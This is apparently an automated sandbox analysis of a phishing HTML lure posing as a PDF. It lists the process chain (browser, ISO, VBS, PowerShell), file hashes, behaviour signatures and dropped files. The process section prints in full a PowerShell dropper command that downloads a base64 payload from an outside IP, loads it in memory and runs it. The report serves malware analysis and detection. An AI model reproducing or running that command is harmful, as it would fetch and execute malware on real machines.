Resubmissions

30-09-2022 14:36

220930-ryr9faegar 10

30-09-2022 14:33

220930-rwy9zadgh5 1

Analysis

  • max time kernel
    206s
  • max time network
    208s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64, arch:x86, image:win7-20220812-en, locale:en-us, os:windows7-x64, system
  • submitted
    30-09-2022 14:36

General

  • Target

    URFT06GSBAWRP_001_PDF.html

  • Size

    198B

  • MD5

    497443cc310648bda5f2a737147b8e7e

  • SHA1

    8b97df0f61c01d75dcc8c47f3a147f24a81538b9

  • SHA256

    22670bbf031cb76a3d98d4fe13e60fa0412401f4b40bc94e186048ddbf63ac26

  • SHA512

    bf19a9c3c6f3a0a118d3f425f00308b2478c1f11eb0ae9028a5c1891e1b71276aaae3b9eb8f6750df8345378820d69046563ceb94963e64ca8776e05d9cad641

Score
10/10

Malware Config

Extracted

  • Language
    ps1
  • Deobfuscated
  • URLs
    ps1.dropper
    http://20.7.14.99/dll/dll_ink.pdf

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 43 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\URFT06GSBAWRP_001_PDF.html
    1⤵
    • Modifies Internet Explorer Phishing Filter
    • Modifies Internet Explorer settings
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1564
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1564 CREDAT:275457 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      PID:2004
    • C:\Windows\System32\isoburn.exe
      "C:\Windows\System32\isoburn.exe" "C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XB6YKGN8\URFT06GSBAWRP_001_PDF.ISO"
      2⤵
      PID:680
    • C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      1⤵
      PID:1620
      • C:\Windows\system32\AUDIODG.EXE
        C:\Windows\system32\AUDIODG.EXE 0x16c
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:952
      • C:\Program Files\7-Zip\7zG.exe
        "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\URFT06GSBAWRP_001_PDF\" -spe -an -ai#7zMap23439:104:7zEvent19216
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        PID:556
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\URFT06GSBAWRP_001_PDF\RQK02HVBPO_002_PDF.vbs"
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:112
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://20.7.14.99/dll/dll_ink.pdf'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('9a82ea0d2fb5-1179-4854-75ce-8a89ca37=nekot&aidem=tla?txt.cnysay/o/moc.topsppa.483ca-dpoj/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth'))
          2⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1112
      • C:\Users\Admin\Downloads\URFT06GSBAWRP_001_PDF\URFT06GSBAWRP_001_PDF.exe
        "C:\Users\Admin\Downloads\URFT06GSBAWRP_001_PDF\URFT06GSBAWRP_001_PDF.exe"
        1⤵
        • Executes dropped EXE
        PID:1096

Network

MITRE ATT&CK Matrix ATT&CK v6

  • Defense Evasion
    Modify Registry (T1112): 2

Downloads

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
        Filesize

        60KB

        MD5

        d15aaa7c9be910a9898260767e2490e1

        SHA1

        2090c53f8d9fc3fbdbafd3a1e4dc25520eb74388

        SHA256

        f8ebaaf487cba0c81a17c8cd680bdd2dd8e90d2114ecc54844cffc0cc647848e

        SHA512

        7e1c1a683914b961b5cc2fe5e4ae288b60bab43bfaa21ce4972772aa0589615c19f57e672e1d93e50a7ed7b76fbd2f1b421089dcaed277120b93f8e91b18af94

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
        Filesize

        1KB

        MD5

        a266bb7dcc38a562631361bbf61dd11b

        SHA1

        3b1efd3a66ea28b16697394703a72ca340a05bd5

        SHA256

        df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

        SHA512

        0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        342B

        MD5

        ce57dadd620a2877d454da90c3344eac

        SHA1

        d3cd77f8cadb5d00b9a6c1cddbe2b2d42fddc5ec

        SHA256

        69060ccaf86b6db1e9076adacde082937e7d51fba129892e069ad2936cf5262e

        SHA512

        b7c735faf3bee993280b6903c715d80dad7f8752284f388fb62f7eb2beeaa898a42c61f8071006c963dc57954bc741a35022ceb23d79a59d0eb4b5cd2773ab8d

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
        Filesize

        242B

        MD5

        ef4a8666488e25f8d05b2e3223eda571

        SHA1

        826825f6ecbef26ae46b2b007db545a7db2ae261

        SHA256

        7aababea875a1721c2513a8a83174b6a7fc3a41dfa44c1e3f1aa592544e5b5de

        SHA512

        bad295ff1301820f62bda1be7b8dce93a3fd06b88eba5e1c803cf5e5aa781192ec78c631815ef5f1a71b43119206b3ba12c4a8afc16eb2309d12bb8dfc1ae8a1

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XB6YKGN8\URFT06GSBAWRP_001_PDF.ISO.lj2t37e.partial
        Filesize

        300.8MB

        MD5

        37dc1aa37c82b73e59376f88fc2c3e8f

        SHA1

        8811fee5c76b96fe8e05bca588987daca34d1254

        SHA256

        f04488660b3ccf2ac4cede57a6a11cee34fe1125183c9ca7474382e3cc1d7050

        SHA512

        59c26259b582c181c2c188821cac344706c6b8b09156696b9ecbeaf0cb140dc977484754412d5e11c07ef905502c44eaffd3b7c1d9137cb12b76134172e459f5

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\N0DDJLUM.txt
        Filesize

        608B

        MD5

        2ecf5de5b963aced0b50e82ab682cc3e

        SHA1

        e903b342aa1652568c136a188c4c7868780ab0ee

        SHA256

        5ed596ee0f16d960fc4c68d8d0bd12bfe4e540a08f74292db03f2eec2c143e1d

        SHA512

        e2c8266b5256c19fa1ab6a2e7793db34ca1390f384e2266ab2b52b968ffbc2ed4e1a923ab42ff28a40819cf44192320488bed897ba6bbd07913d91140ce973fa

      • C:\Users\Admin\Downloads\URFT06GSBAWRP_001_PDF.ISO.n29o7bl.partial
        Filesize

        300.8MB

        MD5

        37dc1aa37c82b73e59376f88fc2c3e8f

        SHA1

        8811fee5c76b96fe8e05bca588987daca34d1254

        SHA256

        f04488660b3ccf2ac4cede57a6a11cee34fe1125183c9ca7474382e3cc1d7050

        SHA512

        59c26259b582c181c2c188821cac344706c6b8b09156696b9ecbeaf0cb140dc977484754412d5e11c07ef905502c44eaffd3b7c1d9137cb12b76134172e459f5

      • C:\Users\Admin\Downloads\URFT06GSBAWRP_001_PDF\RQK02HVBPO_002_PDF.vbs
        Filesize

        219KB

        MD5

        86d9cdbe85e0b345c00063cb59efda75

        SHA1

        6990625fff03cdc505a7c9a224c39fb9c1b1ab80

        SHA256

        541752eae29c171bb8ab3f5851b6f58ba58035298b8781990998d22cd4982f6e

        SHA512

        0f39d5b741cb5fc822f17306537a4659c5ff191f18ef47e18aa3f604eb9d4598f1c01316068285531916a57bd0410b27fd8d44adb3bda41ee691098cd5b1bc2f

      • C:\Users\Admin\Downloads\URFT06GSBAWRP_001_PDF\URFT06GSBAWRP_001_PDF.exe
        Filesize

        97.7MB

        MD5

        e5c6ea76cf6badaa5ba4d382ce895266

        SHA1

        2b32a9c2b87d8c41629708f283988b266a48e9d7

        SHA256

        2f489ee55d5322cc6717e6ff690da0675601159b3e3de0b12142aa300862a161

        SHA512

        d9ff4e39c578bf8fbfafed5ae78181fdfe887659dcf3e2278abf517fd81701559817a0ee98107a966fd47d5159ef0da3fddce6295c6d13474a45d1e256a5c0a5

      • C:\Users\Admin\Downloads\URFT06GSBAWRP_001_PDF\URFT06GSBAWRP_001_PDF.exe
        Filesize

        95.5MB

        MD5

        4272544d6b59dfcbc7bdca819416fc0e

        SHA1

        4a7db0d89b2ce3ec6c56a2475c64ec59e7f28bee

        SHA256

        dd5882295358dcdf2508567dfca058b192316f4052375caf909e57a1e87cf340

        SHA512

        0b34b2f83dc9fe6cde2f8c84340d434eb5524f43305e288d1591604fe6222112e3347677a6c7a9f12a8c819aab6d3bbdea973ed1af23af164ad67e66fc78208e

      • memory/680-55-0x0000000000000000-mapping.dmp
      • memory/680-56-0x000007FEFBCE1000-0x000007FEFBCE3000-memory.dmp
        Filesize

        8KB

      • memory/1096-72-0x0000000075FB1000-0x0000000075FB3000-memory.dmp
        Filesize

        8KB

      • memory/1096-71-0x0000000001370000-0x00000000013A2000-memory.dmp
        Filesize

        200KB

      • memory/1112-73-0x000007FEEE2E0000-0x000007FEEED03000-memory.dmp
        Filesize

        10.1MB

      • memory/1112-69-0x0000000000000000-mapping.dmp
      • memory/1112-74-0x000007FEED780000-0x000007FEEE2DD000-memory.dmp
        Filesize

        11.4MB

      • memory/1112-75-0x0000000002514000-0x0000000002517000-memory.dmp
        Filesize

        12KB

      • memory/1112-76-0x000000001B6F0000-0x000000001B9EF000-memory.dmp
        Filesize

        3.0MB

      • memory/1112-77-0x000000000251B000-0x000000000253A000-memory.dmp
        Filesize

        124KB

      • memory/1112-78-0x0000000002514000-0x0000000002517000-memory.dmp
        Filesize

        12KB

      • memory/1112-79-0x000000000251B000-0x000000000253A000-memory.dmp
        Filesize

        124KB